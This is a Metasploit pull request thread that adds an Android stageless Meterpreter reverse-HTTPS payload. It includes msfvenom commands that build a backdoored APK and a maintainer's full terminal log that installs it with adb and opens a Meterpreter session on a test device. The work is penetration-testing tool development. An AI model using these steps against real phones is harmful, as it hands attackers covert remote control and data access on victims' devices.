Android Stageless Meterpreter over HTTPS
rapid7/metasploit-framework pull request #7920
Opened 2017-02-06 11:03 UTC by sekritskwurl

Change to add functionality for stateless meterpreter over HTTPS.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

generate ask with msfvenom  - 
msfvenom -p android/meterpreter_reverse_https LHOST=<IP> LPORT=443 > out.apk
Install the apk and set android/meterpreter_reverse_https as the multi/handler payload
start handler
install the apk to phone or in emulator
run the apk

2017-02-06 11:04 UTC, sekritskwurl commented
Autocorrect messed up some spelling, apologies.

2017-02-07 05:10 UTC, timwr requested changes
I totally forgot about this! Many thanks :)

2017-02-07 05:10 UTC, timwr commented on modules/payloads/singles/android/meterpreter_reverse_https.rb
> +      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
You don't need this option anymore, we removed it and it's enabled by default
Other than that looks great :)

2017-02-07 08:19 UTC, sekritskwurl commented
Changes applied. I hope that worked let me know if you need anything else. :)

2017-02-07 08:57 UTC, timwr approved these changes

2017-02-07 09:00 UTC, timwr commented
Looks good :) I'll merge asap

2017-02-07 12:53 UTC, merged

2017-02-07 12:56 UTC, timwr commented
```
$ msfvenom -p android/meterpreter_reverse_https LHOST=127.0.0.1 LPORT=4444 -o met.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 70135 bytes
Saved as: met.apk
$ adb install met.apk
Success
$ adb reverse tcp:4444 tcp:4444
$ msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set payload android/meterpreter_reverse_https 
payload => android/meterpreter_reverse_https
msf exploit(handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > adb shell am startservice com.metasploit.stage/.MainService
[*] exec: adb shell am startservice com.metasploit.stage/.MainService

Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.metasploit.stage/.MainService }
msf exploit(handler) > exploit 

[*] Started HTTPS reverse handler on https://127.0.0.1:4444
[*] Starting the payload handler...
[*] https://127.0.0.1:4444 handling request from 127.0.0.1; (UUID: cexoqvye) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:56114) at 2017-02-07 20:52:01 +0800

meterpreter > sysinfo 
Computer    : localhost
OS          : Android 7.0 - Linux 3.10.40-gede039c (armv7l)
Meterpreter : dalvik/android
meterpreter > 
```

2017-02-08 19:16 UTC, tdoan-r7 commented
# Release Notes

Functionality for stateless meterpreter over HTTPS has been added.